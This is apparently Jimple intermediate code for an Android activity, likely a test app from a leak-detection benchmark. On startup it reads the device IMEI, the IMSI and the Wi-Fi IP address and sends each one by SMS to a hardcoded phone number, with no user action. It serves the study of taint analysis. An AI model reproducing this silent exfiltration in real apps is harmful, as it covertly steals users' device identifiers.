public class com.example.no_buttons.MainActivity extends androidx.appcompat.app.AppCompatActivity
{
    public android.content.Intent ipcIntent;
    public android.content.Intent ipcResultIntent;

    public void <init>()
    {
        com.example.no_buttons.MainActivity $r0;

        $r0 := @this: com.example.no_buttons.MainActivity;

        specialinvoke $r0.<androidx.appcompat.app.AppCompatActivity: void <init>()>();

        return;
    }

    protected void onCreate(android.os.Bundle)
    {
        com.example.no_buttons.MainActivity $r0;
        android.os.Bundle $r1;
        java.lang.String $r2, $r6, $r10;
        java.lang.Object $r3;
        android.telephony.TelephonyManager $r4;
        java.lang.StringBuilder $r5;
        android.content.Context $r7;
        android.net.wifi.WifiManager $r8;
        android.net.wifi.WifiInfo $r9;
        int $i0, $i1;
        java.lang.String[] $r11;
        android.telephony.SmsManager $r12;

        $r0 := @this: com.example.no_buttons.MainActivity;

        $r1 := @parameter0: android.os.Bundle;

        specialinvoke $r0.<androidx.appcompat.app.AppCompatActivity: void onCreate(android.os.Bundle)>($r1);

        virtualinvoke $r0.<com.example.no_buttons.MainActivity: void setContentView(int)>(2131296284);

        $r3 = virtualinvoke $r0.<com.example.no_buttons.MainActivity: java.lang.Object getSystemService(java.lang.String)>("phone");

        $r4 = (android.telephony.TelephonyManager) $r3;

        $r5 = new java.lang.StringBuilder;

        specialinvoke $r5.<java.lang.StringBuilder: void <init>()>();

        $r2 = virtualinvoke $r4.<android.telephony.TelephonyManager: java.lang.String getDeviceId()>();

        virtualinvoke $r5.<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>($r2);

        virtualinvoke $r5.<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>("");

        $r2 = virtualinvoke $r5.<java.lang.StringBuilder: java.lang.String toString()>();

        $r5 = new java.lang.StringBuilder;

        specialinvoke $r5.<java.lang.StringBuilder: void <init>()>();

        $r6 = virtualinvoke $r4.<android.telephony.TelephonyManager: java.lang.String getSubscriberId()>();

        virtualinvoke $r5.<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>($r6);

        virtualinvoke $r5.<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>("");

        $r6 = virtualinvoke $r5.<java.lang.StringBuilder: java.lang.String toString()>();

        $r7 = virtualinvoke $r0.<com.example.no_buttons.MainActivity: android.content.Context getApplicationContext()>();

        $r3 = virtualinvoke $r7.<android.content.Context: java.lang.Object getSystemService(java.lang.String)>("wifi");

        $r8 = (android.net.wifi.WifiManager) $r3;

        $r9 = virtualinvoke $r8.<android.net.wifi.WifiManager: android.net.wifi.WifiInfo getConnectionInfo()>();

        $i0 = virtualinvoke $r9.<android.net.wifi.WifiInfo: int getIpAddress()>();

        $r10 = staticinvoke <android.text.format.Formatter: java.lang.String formatIpAddress(int)>($i0);

        $r11 = newarray (java.lang.String)[3];

        $r11[0] = $r2;

        $r11[1] = $r6;

        $r11[2] = $r10;

        $i0 = 0;

     label1:
        $i1 = lengthof $r11;

        if $i0 >= $i1 goto label2;

        $r12 = staticinvoke <android.telephony.SmsManager: android.telephony.SmsManager getDefault()>();

        $r2 = $r11[$i0];

        virtualinvoke $r12.<android.telephony.SmsManager: void sendTextMessage(java.lang.String,java.lang.String,java.lang.String,android.app.PendingIntent,android.app.PendingIntent)>("8502920020", null, $r2, null, null);

        $i0 = $i0 + 1;

        goto label1;

     label2:
        return;
    }

    public android.content.Intent getIntent()
    {
        com.example.no_buttons.MainActivity this;
        android.content.Intent $r0;

        this := @this: com.example.no_buttons.MainActivity;

        $r0 = this.<com.example.no_buttons.MainActivity: android.content.Intent ipcIntent>;

        return $r0;
    }

    public void setIntent(android.content.Intent)
    {
        com.example.no_buttons.MainActivity this;
        android.content.Intent parameter0;

        this := @this: com.example.no_buttons.MainActivity;

        parameter0 := @parameter0: android.content.Intent;

        this.<com.example.no_buttons.MainActivity: android.content.Intent ipcIntent> = parameter0;

        return;
    }

    public void setResult(int, android.content.Intent)
    {
        com.example.no_buttons.MainActivity this;
        int parameter0;
        android.content.Intent parameter1;

        this := @this: com.example.no_buttons.MainActivity;

        parameter0 := @parameter0: int;

        parameter1 := @parameter1: android.content.Intent;

        this.<com.example.no_buttons.MainActivity: android.content.Intent ipcResultIntent> = parameter1;

        return;
    }
}
